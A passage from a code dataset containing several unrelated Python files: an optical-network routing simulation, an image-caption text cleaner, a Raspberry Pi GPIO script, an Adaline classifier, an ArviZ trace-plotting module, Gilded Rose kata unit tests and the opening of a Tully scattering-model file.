vh.applyColorAt(color, StrandType.Staple, baseIdx, undoable=False)\n for i in range(len(stap)):\n combinedLoopSkipAmount = loops[i] + skips[i]\n if combinedLoopSkipAmount != 0:\n vh.installLoop(StrandType.Scaffold, i, combinedLoopSkipAmount, undoable=False)\n return doc\n","sub_path":"model/json_io.py","file_name":"json_io.py","file_ext":"py","file_size_in_byte":4448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"367536074","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# vim: set fileencoding=utf-8\n#\n# GA: RWA with GOF\n# Genetic Algorithm: \n# Routing and Wavelength Assignment with General Objective Function\n#\n# Copyright 2017 Universidade Federal do Pará (PPGCC UFPA)\n#\n# Authors: April 2017\n# Cassio Batista - https://cassota.gitlab.io/\n\n# Last revised on June 2020\n\n# REFERENCES:\n# [1] Afonso Jorge F. Cardoso et. al., 2010\n# A New Proposal of an Efficient Algorithm for Routing and Wavelength \n# Assignment (RWA) in Optical Networks\n# [2] https://la.mathworks.com/matlabcentral/fileexchange/4797-wdm-network-blocking-computation-toolbox\n\nimport sys\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport info\nfrom rwa.ga import rwa_ga # genetic algorithm + gof\nfrom rwa.fixed import rwa_fix # dijkstra + first fit\nfrom rwa.std_fixed import rwa_std_fix # dijkstra + graph coloring\nfrom rwa.alternate import rwa_alt # yen + first fit\nfrom rwa.std_alternate import rwa_std_alt # yen + graph coloring\nif info.USE_NSF:\n from net import nsf as net\nelif info.USE_CLARA:\n from net import clara as net\nelif info.USE_RNP:\n from net import rnp as net\nelif info.USE_JANET:\n from net import janet as net\n\n\ndef get_wave_availability(k, n):\n return (int(n) & ( 1 << k )) >> k\n\ndef write_results_to_disk(dictmap):\n if not os.path.isdir(info.RESULTS_DIR):\n os.mkdir(info.RESULTS_DIR)\n for filename, blocklist in dictmap.items():\n with open(os.path.join(info.RESULTS_DIR, filename), 'a') as f:\n for b in blocklist:\n f.write(' %7.3f' % b)\n f.write('\\n')\n\ndef plot_result_graphs(filelist):\n for f in filelist:\n data = np.loadtxt(os.path.join(info.RESULTS_DIR, f))\n if data.ndim == 1:\n plt.plot(data, '--')\n else:\n plt.plot(data.mean(axis=0), '--')\n if data.ndim == 1 or data.shape[0] < 10:\n print(f, data.shape, end=' ')\n print('remember you should simulate at least 10 times')\n plt.grid()\n plt.ylabel('Blocking probability (%)', fontsize=18)\n plt.xlabel('Load (Erlangs)', fontsize=18)\n plt.title('Average mean blocking probability', fontsize=20)\n plt.legend(filelist)\n plt.show(block=True)\n\nif __name__ == '__main__':\n\n nsf_wave, nsf_adj, nsf_time, nsf_links = net.generate()\n\n blocked_ga = []\n blocked_std_fix = []\n blocked_std_alt = []\n blocked_alt = []\n blocked_fix = []\n\n # should comment this\n if False and info.DEBUG:\n print(nsf_wave)\n\n # ascending loop through Erlangs\n for load in range(info.SIM_MIN_LOAD, info.SIM_MAX_LOAD):\n N_ga = nsf_wave.copy()\n N_std_fix = nsf_wave.copy()\n N_std_alt = nsf_wave.copy()\n N_alt = nsf_wave.copy()\n N_fix = nsf_wave.copy()\n\n T_ga = nsf_time.copy() # holding time\n T_std_fix = nsf_time.copy() # holding time\n T_std_alt = nsf_time.copy() # holding time\n T_alt = nsf_time.copy() # holding time\n T_fix = nsf_time.copy() # holding time\n\n paths_fix = []\n paths_alt = []\n\n count_block_ga = 0\n count_block_std_fix = 0\n count_block_std_alt = 0\n count_block_alt = 0\n count_block_fix = 0\n\n for gen in range(info.SIM_NUM_GEN):\n\n # Poisson arrival is here modelled as an exponential distribution\n # of times, according to Pawełczak MATLAB package [2]:\n # @until_next: time until next call arrives\n # @holding_time: time an allocated call occupies net resources\n until_next = -np.log(1-np.random.rand())/load \n holding_time = -np.log(1-np.random.rand())\n\n count_block_ga += rwa_ga(N_ga, nsf_adj, T_ga, holding_time)\n count_block_std_fix += rwa_std_fix(N_std_fix, nsf_adj, T_std_fix, holding_time, paths_fix)\n count_block_std_alt += rwa_std_alt(N_std_alt, nsf_adj, T_std_alt, holding_time, paths_alt)\n count_block_alt += rwa_alt(N_alt, nsf_adj, T_alt, holding_time)\n count_block_fix += rwa_fix(N_fix, nsf_adj, T_fix, holding_time)\n\n if info.DEBUG:\n sys.stdout.write('\\rLoad: %02d/%02d ' % (load, info.SIM_MAX_LOAD-1))\n sys.stdout.write('Simul: %04d/%04d\\t' % (gen+1, info.SIM_NUM_GEN))\n sys.stdout.write('GA: %04d, ' % count_block_ga)\n sys.stdout.write('STF: %04d, ' % count_block_std_fix)\n sys.stdout.write('STA: %04d, ' % count_block_std_alt)\n sys.stdout.write('ALT: %04d, ' % count_block_alt)\n sys.stdout.write('FIX: %04d ' % count_block_fix)\n sys.stdout.flush()\n\n aux_fix = {idx:[] for idx in range(info.NUM_CHANNELS)}\n aux_alt = {idx:[] for idx in range(info.NUM_CHANNELS)}\n # Update all channels that are still in use\n for link in nsf_links:\n i, j = link\n for w in range(info.NUM_CHANNELS):\n\n # GA + GOF\n if T_ga[i][j][w] > until_next:\n T_ga[i][j][w] -= until_next\n T_ga[j][i][w] = T_ga[i][j][w]\n else:\n T_ga[i][j][w] = 0\n T_ga[j][i][w] = 0\n if not get_wave_availability(w, N_ga[i][j]):\n N_ga[i][j] += 2**w # free channel\n N_ga[j][i] = N_ga[i][j] \n\n # Dijkstra + Graph coloring\n if T_std_fix[i][j][w] > until_next:\n T_std_fix[i][j][w] -= until_next\n T_std_fix[j][i][w] = T_std_fix[i][j][w]\n else:\n T_std_fix[i][j][w] = 0\n T_std_fix[j][i][w] = 0\n if not get_wave_availability(w, N_std_fix[i][j]):\n N_std_fix[i][j] += 2**w # free channel\n N_std_fix[j][i] = N_std_fix[i][j] \n aux_fix[w].append((i,j))\n aux_fix[w].append((j,i))\n\n # Yen + Graph coloring\n if T_std_alt[i][j][w] > until_next:\n T_std_alt[i][j][w] -= until_next\n T_std_alt[j][i][w] = T_std_alt[i][j][w]\n else:\n T_std_alt[i][j][w] = 0\n T_std_alt[j][i][w] = 0\n if not get_wave_availability(w, N_std_alt[i][j]):\n N_std_alt[i][j] += 2**w # free channel\n N_std_alt[j][i] = N_std_alt[i][j] \n aux_alt[w].append((i,j))\n aux_alt[w].append((j,i))\n\n # Yen + First-fit\n if T_alt[i][j][w] > until_next:\n T_alt[i][j][w] -= until_next\n T_alt[j][i][w] = T_alt[i][j][w]\n else:\n T_alt[i][j][w] = 0\n T_alt[j][i][w] = 0\n if not get_wave_availability(w, N_alt[i][j]):\n N_alt[i][j] += 2**w # free channel\n N_alt[j][i] = N_alt[i][j] \n\n # Dijkstra + First-fit\n if T_fix[i][j][w] > until_next:\n T_fix[i][j][w] -= until_next\n T_fix[j][i][w] = T_fix[i][j][w]\n else:\n T_fix[i][j][w] = 0\n T_fix[j][i][w] = 0\n if not get_wave_availability(w, N_fix[i][j]):\n N_fix[i][j] += 2**w # free channel\n N_fix[j][i] = N_fix[i][j] \n\n pop_fix = []\n for path in paths_fix:\n R, color = path\n count = 0\n if color == None:\n continue\n for r in range(len(R)-1):\n rcurr = R[r]\n rnext = R[r+1]\n if (rcurr,rnext) in aux_fix[color]:\n count += 1\n if count == len(R)-1:\n pop_fix.append(paths_fix.index(path))\n\n pop_fix.sort() # make sure the last elements are popped first\n while len(pop_fix):\n paths_fix.pop(pop_fix.pop())\n\n pop_alt = []\n for path in paths_alt:\n R, color = path\n count = 0\n if color == None:\n continue\n for r in range(len(R)-1):\n rcurr = R[r]\n rnext = R[r+1]\n if (rcurr,rnext) in aux_alt[color]:\n count += 1\n if count == len(R)-1:\n pop_alt.append(paths_alt.index(path))\n\n pop_alt.sort() # make sure the last elements are popped first\n while len(pop_alt):\n paths_alt.pop(pop_alt.pop())\n\n blocked_ga.append(100.0*count_block_ga/info.SIM_NUM_GEN)\n blocked_std_fix.append(100.0*count_block_std_fix/info.SIM_NUM_GEN)\n blocked_std_alt.append(100.0*count_block_std_alt/info.SIM_NUM_GEN)\n blocked_alt.append(100.0*count_block_alt/info.SIM_NUM_GEN)\n blocked_fix.append(100.0*count_block_fix/info.SIM_NUM_GEN)\n print('Done')\n\n if info.DEBUG:\n print('Results for this simulation:')\n print(' GA: ', ' '.join(['%6.2f' % b for b in blocked_ga]))\n print(' STF:', ' '.join(['%6.2f' % b for b in blocked_std_fix]))\n print(' STA:', ' '.join(['%6.2f' % b for b in blocked_std_alt]))\n print(' ALT:', ' '.join(['%6.2f' % b for b in blocked_alt]))\n print(' FIX:', ' '.join(['%6.2f' % b for b in blocked_fix]))\n\n # easy association between filenames and block list data structures\n f_ds = {'ga.txt': blocked_ga,\n 'fix.txt': blocked_fix, 'alt.txt': blocked_alt,\n 'std_fix.txt': blocked_std_fix, 'std_alt.txt': blocked_std_alt }\n\n write_results_to_disk(f_ds)\n if info.PLOT_RESULTS:\n plot_result_graphs(f_ds.keys())\n","sub_path":"python/sim_rwa.py","file_name":"sim_rwa.py","file_ext":"py","file_size_in_byte":10219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"541031712","text":"import string\n\n# load text file into memory\ndef load_doc(filename):\n # opening file\n file = open(filename, 'r')\n text = file.read()\n file.close()\n # text variable contains all the information in string format\n return text\n\n# get all images with their captions\ndef all_img_captions(filename):\n file = load_doc(filename)\n captions = file.split('\\n')\n\n # this dictionary contains image ID as key and values as list of captions\n descriptions ={}\n\n for caption in captions[:-1]:\n img, caption = caption.split('\\t')\n\n if img[:-2] not in descriptions:\n descriptions[img[:-2]] = list(caption)\n else:\n descriptions[img[:-2]].append(caption)\n\n return descriptions\n\n# this is for cleaning the data i.e all lower case letters, removing digits, remove punctuations\ndef cleaning_text(descriptions):\n table = str.maketrans('','',string.punctuation)\n\n for img,caps in descriptions.items():\n for i,img_caption in enumerate(caps):\n\n img_caption.replace(\"-\",\" \")\n desc = img_caption.split()\n\n # converts to lowercase\n desc = [word.lower() for word in desc]\n\n # remove punctuation from each token\n desc = [word.translate(table) for word in desc]\n\n # remove hanging 's and a \n desc = [word for word in desc if(len(word)>1)]\n\n # remove tokens with numbers in them\n desc = [word for word in desc if(word.isalpha())]\n\n # convert back to string\n img_caption = ' '.join(desc)\n\n descriptions[img][i]= img_caption\n\n return descriptions\n\n# this is used to seperate all unique words and create a vocabulary from descriptions\ndef text_vocabulary(descriptions):\n # build vocabulary of all unique words\n vocab = set()\n for key in descriptions.keys():\n [vocab.update(d.split()) for d in descriptions[key]]\n return vocab\n\n#All descriptions in one file as descriptions.txt\ndef save_descriptions(descriptions, filename):\n lines = list()\n for key, desc_list in descriptions.items():\n for desc in desc_list:\n lines.append(key + '\\t' + desc )\n data = \"\\n\".join(lines)\n file = open(filename,\"w\")\n file.write(data)\n file.close()\n\n# Set these path according to project folder in you system\ndataset_text = \"src/flickr8k/Flickr_TextData\"\n\n#we prepare our text data\nfilename = dataset_text + \"/\" + \"Flickr8k.token.txt\"\n\n#loading the file that contains all data\n#mapping them into descriptions dictionary img to 5 captions\ndescriptions = all_img_captions(filename)\nprint(\"Length of descriptions =\" ,len(descriptions))\n\n#cleaning the descriptions\nclean_descriptions = cleaning_text(descriptions)\n\n#building vocabulary \nvocabulary = text_vocabulary(clean_descriptions)\nprint(\"Length of vocabulary = \", len(vocabulary))\n\n#saving each description to file \nsave_descriptions(clean_descriptions, \"src/descriptions.txt\")\n","sub_path":"description_generator.py","file_name":"description_generator.py","file_ext":"py","file_size_in_byte":2960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"473711826","text":"#!/usr/bin/python\nimport RPi.GPIO as GPIO\nimport time\nGPIO.setmode(GPIO.BOARD)\nGPIO.setwarnings(1)\nGPIO.setup(3,GPIO.OUT)\nGPIO.setup(5,GPIO.OUT)\nGPIO.output(3,1)\nfor i in range(10):\n\t#print i\n\tGPIO.output(3,1)\n\t\n\tGPIO.output(5,1)\n\ttime.sleep(5/1000000)\n\tGPIO.output(5,0)\n\ttime.sleep(5/1000000)\nGPIO.output(3,1)\n\nGPIO.setup(3,GPIO.IN)\nGPIO.setup(5,GPIO.IN)\n\n\n","sub_path":"kivytest01/old/scl_down.py","file_name":"scl_down.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"91944978","text":"# -*- encoding: utf-8 -*-\nimport sys\nr_input = sys.stdin.readline\n\n\ndef run():\n N = int(r_input())\n dp = [2, 6, 16]\n gap = [4, 10]\n\n if N < 3:\n print(dp[N - 1] + 1)\n exit()\n\n result = 16\n\n for _ in range(N - 3):\n gap[0], gap[1] = gap[1], (gap[1] * 2 + gap[0]) % 9901\n result += gap[1]\n\n print((result + 1) % 9901)\n\n\nif __name__ == '__main__':\n run()\n","sub_path":"Algorithm/Baekjoon/01309 동물원/1309.py","file_name":"1309.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"201497247","text":"import pytest\nfrom mantisshrimp import *\n\n\n@pytest.mark.parametrize(\"model_class\", [MantisFasterRCNN, MantisMaskRCNN])\ndef test_simple_backbone_default_param_groups(model_class, simple_backbone):\n model = model_class(num_classes=2, backbone=simple_backbone)\n assert model.param_groups == [\n simple_backbone,\n model.model.rpn,\n model.model.roi_heads,\n ]\n\n\n@pytest.mark.parametrize(\"model_class\", [MantisFasterRCNN, MantisMaskRCNN])\ndef test_simple_backbone_custom_param_groups(model_class, simple_backbone):\n backbone_param_groups = [simple_backbone.c1, simple_backbone.c2]\n model = model_class(\n num_classes=16, backbone=simple_backbone, param_groups=backbone_param_groups\n )\n expected = backbone_param_groups + [model.model.rpn, model.model.roi_heads]\n assert model.param_groups == expected\n\n\n@pytest.mark.parametrize(\"model_class\", [MantisFasterRCNN, MantisMaskRCNN])\ndef test_default_backbone_default_param_groups(model_class):\n model = model_class(num_classes=42)\n backbone_param_groups = resnet_fpn_backbone_param_groups(model.model.backbone)\n expected = backbone_param_groups + [model.model.rpn, model.model.roi_heads]\n assert len(model.param_groups) == len(expected)\n # check by weight values, not layer reference\n for pg1, pg2 in zip(backbone_param_groups, expected):\n assert list(pg1.parameters()) == list(pg2.parameters())\n","sub_path":"tests/models/mantis_rcnn/test_parameter_groups.py","file_name":"test_parameter_groups.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"114046300","text":"import numpy as np\r\n\r\nclass Adaline:\r\n \r\n \r\n def __init__(self, data, d, learning_rate = 0.5):\r\n self.X = np.ones((len(data),1), dtype=int)\r\n self.X = np.c_[(self.X,data)]\r\n self.d = d\r\n self.learning_rate = learning_rate\r\n self.epochs = 0\r\n self.W = np.random.rand(len(self.X[0,:]))\r\n self.Train = 0\r\n \r\n def trainning(self):\r\n \r\n error = True\r\n \r\n while(error and self.epochs <= 1000):\r\n \r\n self.epochs += 1\r\n error = False\r\n acerto = 0\r\n \r\n for i in range(len(self.X)):\r\n u = self.X[i,:].dot(self.W)\r\n y = self.stepFunction(u)\r\n \r\n if y != self.d[i]:\r\n error = True\r\n for j in range(len(self.W)):\r\n self.W[j] = self.W[j] + self.learning_rate * (self.d[i] - u) * self.X[i,j]\r\n else:\r\n acerto +=1\r\n \r\n acertoPorct = (acerto/len(self.X))*100\r\n self.Train = np.append(self.Train, acertoPorct)\r\n print(self.epochs)\r\n \r\n def execute(self, data):\r\n # cria uma matriz nova para criação\r\n if np.ndim(data) == 1:\r\n self.c = np.insert(data,0,1)\r\n return self.stepFunction(self.c.dot(self.W))\r\n else:\r\n self.c = np.ones((len(data),1), dtype=int)\r\n self.c = np.c_[(self.c,data)]\r\n return [self.stepFunction(self.W.dot(x)) for x in self.c]\r\n \r\n def stepFunction(self, u):\r\n return 1 if u >= 0 else 0\r\n ","sub_path":"Sistemas Inteligentes - Perceptron/adaline.py","file_name":"adaline.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"604278972","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom .kdeplot import fast_kde\nfrom .plot_utils import make_2d, get_bins, _scale_text\nfrom ..utils import get_varnames, trace_to_dataframe, untransform_varnames\nfrom ..compat import altair as alt\n\n\ndef _var_to_traceplot(dataframe, varname, brush):\n df = dataframe.reset_index().melt(id_vars='index')\n\n trace = alt.Chart().mark_line().encode(\n alt.X('index:Q', title='Sample'),\n alt.Y('value:Q', title=varname),\n color=alt.Color('variable:N'),\n opacity=alt.value(0.4 + 0.6 / len(df.variable.unique())),\n ).properties(\n selection=brush,\n width=600,\n height=200\n )\n\n if all(np.issubdtype(dtype, np.dtype('int')) for dtype in dataframe.dtypes.values):\n base = alt.Chart().mark_bar()\n else:\n base = alt.Chart().mark_line()\n\n kde = base.encode(\n x=alt.X('value:Q', bin=alt.Bin(maxbins=100), title=varname),\n y=alt.Y('count():Q', title='Number of Samples'),\n color=alt.Color('variable:N'),\n ).transform_filter(\n brush.ref()\n ).properties(\n height=200\n )\n\n return alt.hconcat(kde, trace, data=df)\n\n\ndef traceplot_altair(dataframe):\n \"\"\"Interactive traceplot using Altair\n \"\"\"\n all_vars, _ = untransform_varnames(dataframe.columns)\n brush = alt.selection_interval(encodings=['x'])\n charts = []\n for base_name, varnames in all_vars.items():\n charts.append(_var_to_traceplot(dataframe.loc[:, varnames], base_name, brush))\n return alt.vconcat(*charts)\n\n\ndef traceplot(trace, varnames=None, figsize=None, textsize=None, lines=None, combined=False,\n grid=True, shade=0.35, priors=None, prior_shade=1, prior_style='--', bw=4.5,\n skip_first=0, ax=None, altair=False):\n \"\"\"Plot samples histograms and values.\n\n Parameters\n ----------\n trace : Pandas DataFrame or PyMC3 trace\n Posterior samples\n varnames : list of variable names\n Variables to be plotted, if None all variable are plotted\n figsize : figure size tuple\n If None, size is (12, num of variables * 2) inch\n textsize: int\n Text size for labels, titles and lines. If None it will be autoscaled based on figsize.\n lines : dict\n Dictionary of variable name / value to be overplotted as vertical lines to the posteriors\n and horizontal lines on sample values e.g. mean of posteriors, true values of a simulation.\n If an array of values, line colors are matched to posterior colors. Otherwise, a default\n `C3` line.\n combined : bool\n Flag for combining multiple chains into a single chain. If False (default), chains will be\n plotted separately.\n grid : bool\n Flag for adding gridlines to histogram. Defaults to True.\n shade : float\n Alpha blending value for plot line. Defaults to 0.35.\n priors : iterable of scipy distributions\n Prior distribution(s) to be plotted alongside posterior. Defaults to None (no prior plots).\n prior_Shade : float\n Alpha blending value for prior plot. Defaults to 1.\n prior_style : str\n Line style for prior plot. Defaults to '--' (dashed line).\n bw : float\n Bandwidth scaling factor for the KDE. Should be larger than 0. The higher this number the\n smoother the KDE will be. Defaults to 4.5 which is essentially the same as the Scott's rule\n of thumb (the default rule used by SciPy).\n skip_first : int\n Number of first samples not shown in plots (burn-in).\n ax : axes\n Matplotlib axes. Accepts an array of axes, e.g.:\n\n >>> fig, axs = plt.subplots(3, 2) # 3 RVs\n >>> pymc3.traceplot(trace, ax=axs)\n\n Creates own axes by default.\n altair : bool\n Should returned plot be an altair chart.\n\n Returns\n -------\n\n ax : matplotlib axes\n\n \"\"\"\n trace = trace_to_dataframe(trace[skip_first:], combined=combined)\n varnames = get_varnames(trace, varnames)\n\n if altair:\n return traceplot_altair(trace.loc[:, varnames])\n\n if figsize is None:\n figsize = (12, len(varnames) * 2)\n\n textsize, linewidth, _ = _scale_text(figsize, textsize=textsize, scale_ratio=1)\n\n _, ax = plt.subplots(len(varnames), 2, squeeze=False, figsize=figsize)\n\n for i, varname in enumerate(varnames):\n if priors is not None:\n prior = priors[i]\n else:\n prior = None\n\n data = trace[varname].values\n data = np.squeeze(data)\n data = make_2d(data)\n width = len(data)\n if data.dtype.kind == 'i':\n hist_objs = _histplot_op(ax[i, 0], data, shade, prior, prior_shade, prior_style)\n colors = [h[-1][0].get_facecolor() for h in hist_objs]\n else:\n artists = _kdeplot_op(ax[i, 0], data, bw, linewidth, prior, prior_shade, prior_style)[0]\n colors = [a[0].get_color() for a in artists]\n ax[i, 0].set_title(varname, fontsize=textsize)\n ax[i, 0].grid(grid)\n ax[i, 1].set_title(varname, fontsize=textsize)\n ax[i, 1].plot(range(width), data, lw=linewidth, alpha=shade)\n\n ax[i, 0].set_yticks([])\n ax[i, 0].tick_params(labelsize=textsize)\n ax[i, 1].tick_params(labelsize=textsize)\n\n if lines:\n try:\n if isinstance(lines[varname], (float, int)):\n line_values, colors = [lines[varname]], ['C3']\n else:\n line_values = np.atleast_1d(lines[varname]).ravel()\n if len(colors) != len(line_values):\n raise AssertionError(\"An incorrect number of lines was specified for \"\n \"'{}'. Expected an iterable of length {} or to \"\n \" a scalar\".format(varname, len(colors)))\n for color, line_value in zip(colors, line_values):\n ax[i, 0].axvline(x=line_value, color=color, lw=1.5, alpha=0.75)\n ax[i, 1].axhline(y=line_value, color=color, lw=1.5, alpha=shade)\n except KeyError:\n pass\n\n ax[i, 0].set_ylim(ymin=0)\n plt.tight_layout()\n return ax\n\n\ndef _histplot_op(ax, data, shade=.35, prior=None, prior_shade=1, prior_style='--'):\n \"\"\"Add a histogram for each column of the data to the provided axes.\"\"\"\n hists = []\n for column in data.T:\n bins = get_bins(column)\n hists.append(ax.hist(column, bins=bins, alpha=shade, align='left',\n density=True))\n if prior is not None:\n x_sample = prior.rvs(1000)\n x = np.arange(x_sample.min(), x_sample.max())\n pmf = prior.pmf(x)\n ax.step(x, pmf, where='mid', alpha=prior_shade, ls=prior_style)\n xticks = get_bins(data, max_bins=10, fenceposts=1)\n ax.set_xticks(xticks)\n\n return hists\n\n\ndef _kdeplot_op(ax, data, bw, linewidth, prior=None, prior_shade=1, prior_style='--'):\n \"\"\"Get a list of density and likelihood plots, if a prior is provided.\"\"\"\n densities = []\n priors = []\n errored = []\n for i, col in enumerate(data.T):\n try:\n density, lower, upper = fast_kde(col, bw=bw)\n x = np.linspace(lower, upper, len(density))\n densities.append(ax.plot(x, density, lw=linewidth))\n if prior is not None:\n x_sample = prior.rvs(10000)\n x = np.linspace(x_sample.min(), x_sample.max(), 1000)\n pdf = prior.pdf(x)\n priors.append(ax.plot(x, pdf, alpha=prior_shade, ls=prior_style))\n\n except ValueError:\n errored.append(str(i))\n\n if errored:\n ax.text(.27, .47, 'WARNING: KDE plot failed for: ' + ','.join(errored),\n bbox={'facecolor': 'red', 'alpha': 0.5, 'pad': 10},\n style='italic')\n\n return densities, priors\n","sub_path":"arviz/plots/traceplot.py","file_name":"traceplot.py","file_ext":"py","file_size_in_byte":7900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"486467598","text":"# -*- coding: utf-8 -*-\nimport unittest\n\nfrom gilded_rose import Item, ConcertItem, GildedRose\n\nSELL_IN_DUE = 0\nMAX_QUANTITY = 50\nMIN_QUANTITY = 0\n\nclass GildedRoseTest(unittest.TestCase):\n\n def setUp(self):\n self.aged_item_name = \"Aged Brie\"\n self.legendary_item_name = \"Sulfuras, Hand of Ragnaros\"\n self.concert_item_name = \"Backstage passes to a TAFKAL80ETC concert\"\n self.base_item_name = \"+5 Dexterity Vest\"\n self.conjured_item_name = \"Conjured Mana Cake\"\n\n # Concert Item tests\n def test_concert_item_update_returns_updated_quality_under_max_quantity(self):\n set_quality = 48\n set_sell_in = 4\n concert = ConcertItem(Item(self.concert_item_name, set_sell_in, set_quality))\n\n concert.update()\n\n self.assertEquals(concert.item.quality, MAX_QUANTITY)\n\n def test_concert_item_update_returns_updated_quality(self):\n set_quality = 30\n set_sell_in = 4\n expected_increase = 3\n concert = ConcertItem(Item(self.concert_item_name, set_sell_in, set_quality))\n\n concert.update()\n\n self.assertEquals(concert.item.quality, set_quality + expected_increase)\n\n # gilded rose requirements to tests\n def test_item_when_update_quality_called_sell_in_reduces(self):\n items = [Item(self.base_item_name, SELL_IN_DUE, 1)]\n gilded_rose = GildedRose(items)\n\n gilded_rose.update_quality()\n\n self.assertEquals(items[0].sell_in, -1)\n\n def test_item_when_update_quality_called_quality_decrease(self):\n items = [Item(self.base_item_name, 1, 1)]\n gilded_rose = GildedRose(items)\n\n gilded_rose.update_quality()\n\n self.assertEquals(items[0].quality, MIN_QUANTITY)\n\n def test_item_quality_can_not_be_negative(self):\n items = [Item(self.base_item_name, SELL_IN_DUE, MIN_QUANTITY)]\n gilded_rose = GildedRose(items)\n\n gilded_rose.update_quality()\n\n self.assertEquals(items[0].quality, MIN_QUANTITY)\n\n def test_item_when_sell_in_date_passed_quality_degrades_by_two(self):\n set_quantity = 10\n expected_decrease = 2\n items = [Item(self.base_item_name, SELL_IN_DUE, set_quantity)]\n gilded_rose = GildedRose(items)\n\n gilded_rose.update_quality()\n\n self.assertEquals(items[0].quality, set_quantity - expected_decrease)\n\n def test_aged_item_when_sell_by_date_passed_increases_quality_by_two(self):\n set_quantity = 10\n expected_incremental = 2\n items = [Item(self.aged_item_name, SELL_IN_DUE, set_quantity)]\n gilded_rose = GildedRose(items)\n\n gilded_rose.update_quality()\n\n self.assertEquals(items[0].quality, set_quantity + expected_incremental)\n\n def test_aged_item_quality_can_not_exceed_fifty(self):\n items = [Item(self.aged_item_name, SELL_IN_DUE, MAX_QUANTITY)]\n gilded_rose = GildedRose(items)\n\n gilded_rose.update_quality()\n\n self.assertEquals(items[0].quality, MAX_QUANTITY)\n\n def test_legendary_item_never_decreases_quality(self):\n set_quantity = 80\n items = [Item(self.legendary_item_name, SELL_IN_DUE, set_quantity)]\n gilded_rose = GildedRose(items)\n\n gilded_rose.update_quality()\n\n self.assertEquals(items[0].quality, set_quantity)\n\n def test_concert_item_when_sell_in_more_than_ten_days_quality_increase_by_one(self):\n set_quantity = 20\n set_sell_in = 15\n expected_incremental = 1\n items = [Item(self.concert_item_name, set_sell_in, set_quantity)]\n gilded_rose = GildedRose(items)\n\n gilded_rose.update_quality()\n\n self.assertEquals(items[0].quality, set_quantity + expected_incremental)\n\n def test_concert_item_when_sell_in_less_than_ten_days_quality_increase_by_two(self):\n set_quantity = 20\n ten_days_left = 10\n expected_incremental = 2\n items = [Item(self.concert_item_name, ten_days_left, set_quantity)]\n gilded_rose = GildedRose(items)\n\n gilded_rose.update_quality()\n\n self.assertEquals(items[0].quality, set_quantity + expected_incremental)\n\n\n def test_concert_item_when_sell_in_left_five_days_quality_increase_by_three(self):\n set_quantity = 20\n five_days_left = 5\n expected_incremental = 3\n items = [Item(self.concert_item_name, five_days_left, set_quantity)]\n gilded_rose = GildedRose(items)\n\n gilded_rose.update_quality()\n\n self.assertEquals(items[0].quality, set_quantity + expected_incremental)\n\n def test_concert_item_when_date_passes_quality_set_zero(self):\n set_quantity = 20\n items = [Item(self.concert_item_name, SELL_IN_DUE, set_quantity)]\n gilded_rose = GildedRose(items)\n\n gilded_rose.update_quality()\n\n self.assertEquals(items[0].quality, MIN_QUANTITY)\n\n def test_conjured_item_drops_value_twice_faster(self):\n set_sell_in = 10\n set_quality = 20\n expected_decrease = 2\n items = [Item(self.conjured_item_name, set_sell_in, set_quality)]\n gilded_rose = GildedRose(items)\n\n gilded_rose.update_quality()\n\n self.assertEquals(items[0].quality, set_quality - expected_decrease)\n\n def test_conjured_item_quality_can_not_be_negative(self):\n items = [Item(self.conjured_item_name, SELL_IN_DUE, MIN_QUANTITY)]\n gilded_rose = GildedRose(items)\n\n gilded_rose.update_quality()\n\n self.assertEquals(items[0].quality, MIN_QUANTITY)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"python/test_gilded_rose.py","file_name":"test_gilded_rose.py","file_ext":"py","file_size_in_byte":5512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"321356832","text":"## @package tullymodels\n# Implementations of the one-dimensional two-state models Tully demonstrated FSSH on in Tully, J.C. J. Chem. Phys. 1990 93 1061.\n\nimport numpy as np\nimport math as m\n\n# Here are some helper functions that pad the model problems with fake electronic states.\n# Useful for debugging, so keeping it around\n'''\ndef pad_model(nstates, diags):\n def V_decorator(func):\n def wrapper(*args, **kwargs):\n out = func(*args, **kwargs)\n oldnstates = out.shape[0]\n out = np.pad(out, (0,nstates), 'constant')\n if nstates > 1:\n for i in range(nstates):\n out[oldnstates+i,oldnstates+i] = diags[i]\n else:\n out[-1,-1] = diags\n return out\n return wrapper\n\n def dV_decorator(func):\n def wrapper(*args, **kwargs):\n out = func(*args, **kwargs)\n nout = np.zeros([out.shape[0], out.shape[1]+nstates, out.shape[2]+nstates])\n nout[:,0:out.shape[1],0:out.shape[2]] += out[:,:,:]\n return nout\n return wrapper\n\n def nstates_decorator(func):\n def wrapper(*args, **kwargs):\n return func(*args, **kwargs) + nstates\n return wrapper\n\n def class_decorator(cls):\n class padded_model(cls):\n def __init__(self, *args, **kwargs):\n cls.__init__(self, *args, **kwargs)\n\n self.V = V_decorator(self.V)\n self.dV = dV_decorator(self.dV)\n self.nstates = nstates_decorator(self.nstates)\n\n return padded_model\n return class_decorator\n'''\n\n## Tunneling through a single barrier model used in Tully's 1990 JCP\n#\n# \\f[\n# V_{11} = \\left\\{ \\begin{array}{cr}\n# A (1 - e^{Bx}) & x < 0 \\\\\n# -A (1 - e^{-Bx}) & x > 0\n# \\end{array} \\right.\n# \\f]\n# \\f[ V_{22} = -V_{11} \\f]\n# \\f[ V_{12} = V_{21} = C e^{-D x^2} \\f]\nclass TullySimpleAvoidedCrossing(object):\n ## Constructor that defaults to the values reported in Tully's 1990 JCP\n def __init__(self, a = 0.01, b = 1.6, c = 